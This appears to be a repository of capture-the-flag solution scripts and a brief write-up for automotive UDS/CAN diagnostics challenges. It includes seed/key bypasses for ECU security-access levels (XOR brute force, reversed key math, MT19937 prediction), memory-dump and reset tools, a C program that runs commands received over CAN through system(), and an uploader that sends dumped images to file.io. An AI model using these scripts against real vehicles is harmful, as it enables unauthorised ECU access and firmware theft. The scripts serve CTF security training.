 6 |     print('Usage: python getmem.py <addr> <size> [<file>]')
 7 |     print('')
 8 |     print('  Read <size> bytes from <addr> and dump them to <file> (or stdout).')
 9 |     print('')
10 |     print('E.g.   python getmem.py 0x00400000 1048576 image.bin')
11 |     print('E.g.   python getmem.py 0xC0FFE000 4096')
12 |     sys.exit(0)
13 | 
14 | addr = int(sys.argv[1], 16)
15 | size = int(sys.argv[2], 10)
16 | 
17 | s = socket(timeout=5)
18 | 
19 | if len(sys.argv) == 3:
20 |     sys.stdout.buffer.write(readmem(s, addr, size))
21 | else:
22 |     with open(sys.argv[3], 'wb') as file:
23 |         readmem(s, addr, size, file)
24 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/scripts/level1.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | from common import *
 4 | 
 5 | def broadcast(x, n):
 6 |     '''Broadcast byte `x` to all bytes in an `n`-byte integer.'''
 7 |     k = 8
 8 |     while n > 1:
 9 |         x  |= (x << k)
10 |         n >>= 1
11 |         k <<= 1
12 |     return x
13 | 
14 | s = socket()
15 | 
16 | for x in range(256):
17 |     seed = getseed(s, 1)
18 |     if not seed:
19 |         print('Already authenticated to security access level 1')
20 |         sys.exit(0)
21 |     data = sendkey(s, 1, p32(u32(seed) ^ broadcast(x, 4)))
22 |     if data:
23 |         print(data.decode())
24 |         break
25 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/scripts/level3.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | from common import *
 4 | 
 5 | s = socket()
 6 | 
 7 | seed = getseed(s, 3)
 8 | if not seed:
 9 |     print('Already authenticated to security access level 3')
10 |     sys.exit(0)
11 | 
12 | # The key is computed from the following set of bit manipulations.
13 | # See lines 145-149 of the `UDSHandler` function in image.bin.gzf.
14 | key = [ 0 ] * 4
15 | key[1] = ((seed[1] + (seed[2] ^ seed[1]) ^ 0xed) - (seed[2] << 4)) & 0xff
16 | key[0] = ((seed[0] + (seed[3] ^ seed[0]) ^ 0xfe) - (seed[3] << 4)) & 0xff
17 | key[2] = ((seed[2] + (seed[1] ^ seed[3]) ^ 0xfa) - (seed[1] << 4)) & 0xff
18 | key[3] = ((seed[3] + (seed[0] ^ seed[2]) ^ 0xce) - (seed[0] << 4)) & 0xff
19 | data = sendkey(s, 3, bytes(key))
20 | 
21 | print(data.decode())
22 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/scripts/level5.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | from mt19937predictor import MT19937Predictor
 4 | from common import *
 5 | 
 6 | N = 32
 7 | 
 8 | s = socket()
 9 | 
10 | # Seed the PRNG. Either 1 or 3 will work ...
11 | getseed(s, 3)
12 | 
13 | # Feed the predictor the first 624 outputs of the PRNG.
14 | predictor = MT19937Predictor()
15 | for _ in range(624):
16 |     seed = getseed(s, 5)
17 |     if not seed:
18 |         print('Already authenticated to security access level 5')
19 |         sys.exit(0)
20 |     predictor.setrandbits(u32(seed), N)
21 | 
22 | # Get the next output, which should be used as the key.
23 | key = predictor.getrandbits(N)
24 | data = sendkey(s, 5, p32(key))
25 | 
26 | print(data.decode())
27 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/scripts/rdbid.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | from common import *
 4 | 
 5 | if len(sys.argv) < 2:
 6 |     print('Usage: python rdbid.py <DID>')
 7 |     print('')
 8 |     print('  Read data by its hex-encoded identifier.')
 9 |     print('')
10 |     print('E.g.   python rdbid.py 00 08')
11 |     sys.exit(0)
12 | 
13 | did = int(''.join(sys.argv[1:]), 16)
14 | 
15 | # Read data by identifier.
16 | reply = sendrecv(socket(), bytes([ 0x22 ]) + p16(did))
17 | assert_not_nrc(reply)
18 | data = getdata(reply).decode()
19 | print(data)
20 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/scripts/reset.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | from common import *
 4 | 
 5 | if len(sys.argv) > 2:
 6 |     print('Usage: python reset.py [kind]')
 7 |     sys.exit(0)
 8 | 
 9 | if len(sys.argv) > 1:
10 |     kind = int(sys.argv[1])
11 | else:
12 |     kind = 1   # hard reset
13 | 
14 | assert_not_nrc(sendrecv(socket(), bytes([ 0x11, kind ])))
15 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/scripts/rtctl.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | from common import *
 4 | 
 5 | ACTIONS = { 'start' : RT_CTL_START, 'stop' : RT_CTL_STOP, 'status' : RT_CTL_STATUS }
 6 | 
 7 | if len(sys.argv) < 3:
 8 |     print('Usage: python rtctl.py start|stop|status <RID>')
 9 |     print('')
10 |     print('  Control the service with the given <RID>.')
11 |     print('')
12 |     print('E.g.   python rtctl.py start 13 37')
13 |     sys.exit(0)
14 | 
15 | action = ACTIONS.get(sys.argv[1], None)
16 | rid    = int(''.join(sys.argv[2:]), 16)
17 | if not action:
18 |     print(f'Invalid action -- {sys.argv[1]!r}')
19 |     sys.exit(1)
20 | else:
21 |     data = rtctl(socket(), rid, action)
22 |     if len(data) > 0:
23 |         print(data.decode())
24 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/scripts/tprepl.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | from common import *
 4 | 
 5 | END = b'\x7f\x8c\x25\xab\xb6\x16\x1e\x94'
 6 | 
 7 | try:
 8 |     s = socket()
 9 |     while True:
10 |         s.send(input('> ').encode())
11 |         res = b''
12 |         while not res.endswith(END):
13 |             data = s.recv()
14 |             if data:
15 |                 res += data
16 |         res = res[:-8]
17 |         print(res.decode())
18 | except KeyboardInterrupt:
19 |     print()
20 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/scripts/unlock.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | from mt19937predictor import MT19937Predictor
 4 | from common import *
 5 | 
 6 | def level1(s):
 7 |     seed = getseed(s, 1)
 8 |     if not seed:
 9 |         return
10 |     # The key is the bitwise exclusive-or of the seed and 0x20202020.
11 |     return sendkey(s, 1, p32(u32(seed) ^ 0x20202020))
12 | 
13 | def level3(s):
14 |     seed = getseed(s, 3)
15 |     if not seed:
16 |         return
17 |     # The key is computed via the following set of bit manipulations.
18 |     key = [ 0 ] * 4
19 |     key[1] = ((seed[1] + (seed[2] ^ seed[1]) ^ 0xed) - (seed[2] << 4)) & 0xff
20 |     key[0] = ((seed[0] + (seed[3] ^ seed[0]) ^ 0xfe) - (seed[3] << 4)) & 0xff
21 |     key[2] = ((seed[2] + (seed[1] ^ seed[3]) ^ 0xfa) - (seed[1] << 4)) & 0xff
22 |     key[3] = ((seed[3] + (seed[0] ^ seed[2]) ^ 0xce) - (seed[0] << 4)) & 0xff
23 |     return sendkey(s, 3, bytes(key))
24 | 
25 | def level5(s):
26 |     seed = getseed(s, 5)
27 |     if not seed:
28 |         return
29 |     N = 32
30 |     # Seed the PRNG. Either 1 or 3 will work ...
31 |     junk = getseed(s, 3)
32 |     # Feed the predictor the first 624 outputs of the PRNG.
33 |     predictor = MT19937Predictor()
34 |     for _ in range(624):
35 |         predictor.setrandbits(u32(getseed(s, 5)), N)
36 |     # Get the next output, which should be used as the key.
37 |     key = predictor.getrandbits(N)
38 |     return sendkey(s, 5, p32(key))
39 | 
40 | def unlock(s):
41 |     level1(s)
42 |     level3(s)
43 |     level5(s)
44 | 
45 | unlock(socket())
46 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/scripts/upload.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | import json
 4 | import os
 5 | import requests
 6 | import sys
 7 | 
 8 | if len(sys.argv) != 2:
 9 |     print('Usage: python upload.py <file>')
10 |     print()
11 |     print('  Upload <file> to file.io and retrieve a download key.')
12 |     print()
13 |     print('E.g.   python upload.py image.bin')
14 |     sys.exit(0)
15 | 
16 | filepath = sys.argv[1]
17 | filename = os.path.basename(filepath)
18 | 
19 | with open(filepath, 'rb') as file:
20 |     res = requests.post('https://file.io/', files={ 'file': ( filename, file ) })
21 |     key = json.loads(res.text)['key']
22 |     print(f'{key = }')
23 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/security-access-lvl-3-key-check.png:
--------------------------------------------------------------------------------
1 | version https://git-lfs.github.com/spec/v1
2 | oid sha256:980065202f18a20d9cf77a7f339f875d73a570dc720ce40be0e1762eb9230fa5
3 | size 97271
4 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/security-access-lvl-5-key-check.png:
--------------------------------------------------------------------------------
1 | version https://git-lfs.github.com/spec/v1
2 | oid sha256:8a722373b18b0872dca78983a3709169b1c26ea533cbff940bee595cd0290068
3 | size 277950
4 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/shell.c:
--------------------------------------------------------------------------------
 1 | #include <errno.h>
 2 | #include <linux/can.h>
 3 | #include <linux/can/isotp.h>
 4 | #include <net/if.h>
 5 | #include <stdio.h>
 6 | #include <stdlib.h>
 7 | #include <string.h>
 8 | #include <sys/ioctl.h>
 9 | #include <sys/socket.h>
10 | #include <sys/types.h>
11 | #include <unistd.h>
12 | 
13 | #define TP_MTU 4095
14 | 
15 | #define SEND_COMPLETE(fd) write(fd, "\x7f\x8c\x25\xab\xb6\x16\x1e\x94", 8)
16 | 
17 | int main(void)
18 | {
19 |     int fd = socket(AF_CAN, SOCK_DGRAM, CAN_ISOTP);
20 |     if (fd < 0) {
21 |         fprintf(stderr, "[!] error: Failed to open server socket -- %s\n", strerror(errno));
22 |         return 1;
23 |     }
24 |     struct can_isotp_fc_options fcopts = { .bs = 16, .stmin = 5, .wftmax = 0 };
25 |     if (setsockopt(fd, SOL_CAN_ISOTP, CAN_ISOTP_RECV_FC, &fcopts, sizeof(fcopts)) < 0) {
26 |         fprintf(stderr, "[!] error: Failed to set socket options -- %s\n", strerror(errno));
27 |         return 1;
28 |     }
29 | 
30 |     struct ifreq ifr;
31 |     strcpy(ifr.ifr_name, "vcan0");
32 |     ioctl(fd, SIOCGIFINDEX, &ifr);
33 | 
34 |     struct sockaddr_can addr;
35 |     memset(&addr, 0, sizeof(addr));
36 |     addr.can_family = AF_CAN;
37 |     addr.can_addr.tp.rx_id = 0x7e0;
38 |     addr.can_addr.tp.tx_id = 0x7e8;
39 |     addr.can_ifindex = ifr.ifr_ifindex;
40 |     if (bind(fd, (struct sockaddr*) &addr, sizeof(addr)) < 0) {
41 |         fprintf(stderr, "[!] error: Failed to bind server socket -- %s\n", strerror(errno));
42 |         return 1;
43 |     }
44 | 
45 |     dup2(fd, 0);
46 |     dup2(fd, 1);
47 |     dup2(fd, 2);
48 | 
49 |     char data[TP_MTU + 1];
50 |     while (1) {
51 |         ssize_t size = read(0, data, TP_MTU);
52 |         if (size < 0) {
53 |             fprintf(stderr, "[!] error: Failed to read user data -- %s\n", strerror(errno));
54 |             continue;
55 |         }
56 |         if (size < 1) {
57 |             continue;
58 |         }
59 |         data[size] = '\0';
60 |         system(data);
61 |         SEND_COMPLETE(fd);
62 |     }
63 | 
64 |     return 1;
65 | }
66 | 


--------------------------------------------------------------------------------
/vsec-harborbay/Pipfile:
--------------------------------------------------------------------------------
 1 | [[source]]
 2 | url = "https://pypi.org/simple"
 3 | verify_ssl = true
 4 | name = "pypi"
 5 | 
 6 | [packages]
 7 | can-isotp = "*"
 8 | 
 9 | [dev-packages]
10 | 
11 | [requires]
12 | python_version = "3.11"
13 | python_full_version = "3.11.5"
14 | 


--------------------------------------------------------------------------------
/vsec-harborbay/Pipfile.lock:
--------------------------------------------------------------------------------
 1 | {
 2 |     "_meta": {
 3 |         "hash": {
 4 |             "sha256": "14ecc46647d3082ed29026f2da1b8d723c9e2487f0e0cd6af047b0bf8815537f"
 5 |         },
 6 |         "pipfile-spec": 6,
 7 |         "requires": {
 8 |             "python_full_version": "3.11.5",
 9 |             "python_version": "3.11"
10 |         },
11 |         "sources": [
12 |             {
13 |                 "name": "pypi",
14 |                 "url": "https://pypi.org/simple",
15 |                 "verify_ssl": true
16 |             }
17 |         ]
18 |     },
19 |     "default": {
20 |         "can-isotp": {
21 |             "hashes": [
22 |                 "sha256:b69258bf528b2bcfe8de1bfa63f12ae4a19abb329f9520eec67e992f7a6107de",
23 |                 "sha256:cbfa9b644054a9d68710f6e00e26d0c22342b55d9bdcaad654effb3046f96ee0"
24 |             ],
25 |             "index": "pypi",
26 |             "markers": "python_version >= '3.7'",
27 |             "version": "==1.9"
28 |         }
29 |     },
30 |     "develop": {}
31 | }
32 | 


--------------------------------------------------------------------------------
/vsec-harborbay/README.md:
--------------------------------------------------------------------------------
 1 | # VSEC HarborBay
 2 | 
 3 | The [scripts](scripts) directory contains the scripts I used to solve all the challenges in the VSEC
 4 | HarborBay CTF category. Most of these challenges were simple enough to where you can understand the
 5 | solutions simply by reading the source code of these scripts.
 6 | 
 7 | Below, however, are writeups for _Security Access Level 3_ and _Security Access Level 1_.
 8 | 
 9 | ## Security Access Level 3 Writeup
10 | 
11 | In this challenge, we are supposed to authenticate to security access level 3 _"using MAAATH"_.
12 | While it's hard to know what kind of math the author(s) had in mind, the value we get when
13 | requesting a seed for level 3 is only 16 bits, so, in the worst case scenario, we could probably
14 | write a script to try many different things and see what produces valid keys. When I attempted this
15 | challenge, I just tried a few things manually and quickly discovered that the key is computed as the
16 | bitwise complement of the seed.
17 | 
18 | ```py
19 | def level3(s):
20 |     # Request an extended diagnostic session.
21 |     reply = sendrecv(s, bytes([ 0x10, 0x03 ]))
22 |     assert_not_nrc(reply)
23 |     # Send seed request for security access level 3.
24 |     reply = sendrecv(s, bytes([ 0x27, 0x03 ]))
25 |     assert_not_nrc(reply)
26 |     val = get_data(reply)
27 |     # The key is the bitwise complement of the seed.
28 |     key = p16(~u16(val) & 0xffff)
29 |     # Send the key.
30 |     reply = sendrecv(s, bytes([ 0x27, 0x04 ]) + key)
31 |     assert_not_nrc(reply)
32 | 
33 | def unlock(s):
34 |     level3(s)
35 |     level1(s)
36 | 
37 | unlock(socket())
38 | ```
39 | 
40 | The challenge description states that the flag is the key for seed 1337 in hex, so we just take the
41 | bitwise complement and we have our solution.
42 | 
43 | **Flag:** `fac6`
44 | 
45 | ## Security Access Level 1 Writeup
46 | 
47 | After authenticating to security access level 3, we have access to the programming diagnostic
48 | session (0x02) and 8 KiB of memory starting at address `0x1a000`. Whenever we request a seed for
49 | security access level 1, we'll notice that the seed is written to address `0x1ac00` and the key is
50 | written to address `0x1ac08`. We could just read the key from memory every time we want to
51 | authenticate to access level 1, but the challenge asks us for the key for a specific seed
52 | (`7D0E1A5C`). Therefore, we need to figure out the relationship between the seeds and the keys. If
53 | we generate several seeds and print their corresponding keys, there doesn't seem to be much of a
54 | relation right away. However, if we xor each seed with its key, then we'll see that the result is
55 | always `5539AA17`. Thus, the key for any seed is the seed xor-ed by this fixed "secret" value.
56 | 
57 | ```py
58 | def level1(s):
59 |     # Request a programming session.
60 |     reply = sendrecv(s, bytes([ 0x10, 0x02 ]))
61 |     assert_not_nrc(reply)
62 |     # Send seed request for security access level 1.
63 |     reply = sendrecv(s, bytes([ 0x27, 0x01 ]))
64 |     assert_not_nrc(reply)
65 |     val = get_data(reply)
66 |     # The key is the bitwise exclusive-or of the seed and 0x5539aa17.
67 |     key = xorbytes(val, p32(0x5539aa17))
68 |     # Send the key.
69 |     reply = sendrecv(s, bytes([ 0x27, 0x02 ]) + key)
70 |     assert_not_nrc(reply)
71 | 
72 | def unlock(s):
73 |     level3(s)
74 |     level1(s)
75 | 
76 | unlock(socket())
77 | ```
78 | 
79 | **Flag:** `2837b04b`
80 | 


--------------------------------------------------------------------------------
/vsec-harborbay/scripts/common.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | import isotp
 4 | import struct
 5 | import sys
 6 | import time
 7 | 
 8 | DEBUG = False
 9 | 
10 | DATA_OFFS = {
11 |     0x59 : 3,
12 |     0x62 : 3,
13 |     0x63 : 1,
14 |     0x67 : 2,
15 |     }
16 | 
17 | READ_MEMORY_MAX_SIZE = 0x800
18 | 
19 | p16, u16 = lambda x: struct.pack('>H', x), lambda x: struct.unpack('>H', x)[0]
20 | p32, u32 = lambda x: struct.pack('>I', x), lambda x: struct.unpack('>I', x)[0]
21 | p64, u64 = lambda x: struct.pack('>Q', x), lambda x: struct.unpack('>Q', x)[0]
22 | 
23 | def xorbytes(a, b):
24 |     return bytes(map(lambda x, y: x ^ y, a, b))
25 | 
26 | def socket(iface='vcan0', **kwargs):
27 |     timeout = kwargs.get('timeout', 0.1)
28 |     s = isotp.socket(timeout)
29 |     rxid = kwargs.get('rxid', 0x7e8)
30 |     txid = kwargs.get('txid', 0x7e0)
31 |     s.set_ll_opts(**kwargs.get('ll_opts', dict()))
32 |     s.set_fc_opts(**kwargs.get('fc_opts', dict(stmin=5, bs=10)))
33 |     s.bind(iface, isotp.Address(rxid=rxid, txid=txid))
34 |     return s
35 | 
36 | def sendrecv(s, request):
37 |     s.send(request)
38 |     return s.recv()
39 | 
40 | def assert_not_nrc(reply):
41 |     assert(reply and reply[0] != 0x7f)
42 | 
43 | def get_data(reply):
44 |     return reply[DATA_OFFS[reply[0]]:]
45 | 
46 | def readmem(s, addr, size):
47 |     dump = b''
48 |     step = min(READ_MEMORY_MAX_SIZE, size)
49 |     while step > 0:
50 |         reply = sendrecv(s, bytes([ 0x23, 0x24 ]) + p32(addr) + p16(step))
51 |         if reply and reply[0] != 0x7f:
52 |             dump  += get_data(reply)
53 |             addr  += step
54 |             size  -= step
55 |             step   = min(step, size)
56 |         else:
57 |             step //= 2
58 |     return dump
59 | 


--------------------------------------------------------------------------------
/vsec-harborbay/scripts/getdtc.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | 
3 | from common import *
4 | 
5 | # Report Diagnostics Trouble Codes (DTC) by status mask (0xff = full mask).
6 | reply = sendrecv(socket(), bytes([ 0x19, 0x02, 0xff ]))
7 | assert_not_nrc(reply)
8 | print(get_data(reply).hex())
9 | 


--------------------------------------------------------------------------------
/vsec-harborbay/scripts/getmem.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | from common import *
 4 | 
 5 | if len(sys.argv) != 3:
 6 |     print('Usage: python getmem.py <addr> <size>')
 7 |     print('')
 8 |     print('  Read <size> bytes from <addr> and dump them to stdout.')
 9 |     print('')
10 |     print('E.g.   python getmem.py 0xC3F80000 16')
11 |     sys.exit(0)
12 | 
13 | addr = int(sys.argv[1], 16)
14 | size = int(sys.argv[2], 10)
15 | 
16 | sys.stdout.buffer.write(readmem(socket(), addr, size))
17 | 


--------------------------------------------------------------------------------
/vsec-harborbay/scripts/getvin.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | 
3 | from common import *
4 | 
5 | # Read data by identifier (0xf190 = VIN).
6 | reply = sendrecv(socket(), bytes([ 0x22, 0xf1, 0x90 ]))
7 | assert_not_nrc(reply)
8 | print(get_data(reply).decode())
9 | 


--------------------------------------------------------------------------------
/vsec-harborbay/scripts/reset.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | from common import *
 4 | 
 5 | if len(sys.argv) > 2:
 6 |     print('Usage: python reset.py [kind]')
 7 |     sys.exit(0)
 8 | 
 9 | if len(sys.argv) > 1:
10 |     kind = int(sys.argv[1])
11 | else:
12 |     kind = 1   # hard reset
13 | 
14 | s = socket()
15 | broadcasts = socket(rxid=0x7df, timeout=5)
16 | reply = sendrecv(s, bytes([ 0x11, kind ]))
17 | assert_not_nrc(reply)
18 | print(broadcasts.recv().decode())
19 | 


--------------------------------------------------------------------------------
/vsec-harborbay/scripts/tester.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | from common import *
 4 | 
 5 | INTERVAL = 3
 6 | 
 7 | s = socket()
 8 | while True:
 9 |     # Send tester present service ID, periodically.
10 |     assert_not_nrc(sendrecv(s, bytes([ 0x3e ])))
11 |     time.sleep(INTERVAL)
12 | 


--------------------------------------------------------------------------------
/vsec-harborbay/scripts/unlock.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | from common import *
 4 | 
 5 | def level3(s):
 6 |     # Request an extended diagnostic session.
 7 |     reply = sendrecv(s, bytes([ 0x10, 0x03 ]))
 8 |     assert_not_nrc(reply)
 9 |     # Send seed request for security access level 3.
10 |     reply = sendrecv(s, bytes([ 0x27, 0x03 ]))
11 |     assert_not_nrc(reply)
12 |     val = get_data(reply)
13 |     # The key is the bitwise complement of the seed.
14 |     key = p16(~u16(val) & 0xffff)
15 |     # Send the key.
16 |     reply = sendrecv(s, bytes([ 0x27, 0x04 ]) + key)
17 |     assert_not_nrc(reply)
18 | 
19 | def level1(s):
20 |     # Request a programming session.
21 |     reply = sendrecv(s, bytes([ 0x10, 0x02 ]))
22 |     assert_not_nrc(reply)
23 |     # Send seed request for security access level 1.
24 |     reply = sendrecv(s, bytes([ 0x27, 0x01 ]))
25 |     assert_not_nrc(reply)
26 |     val = get_data(reply)
27 |     # The key is the bitwise exclusive-or of the seed and 0x5539aa17.
28 |     key = xorbytes(val, p32(0x5539aa17))
29 |     # Send the key.
30 |     reply = sendrecv(s, bytes([ 0x27, 0x02 ]) + key)
31 |     assert_not_nrc(reply)
32 | 
33 | def unlock(s):
34 |     level3(s)
35 |     level1(s)
36 | 
37 | unlock(socket())
38 | 


--------------------------------------------------------------------------------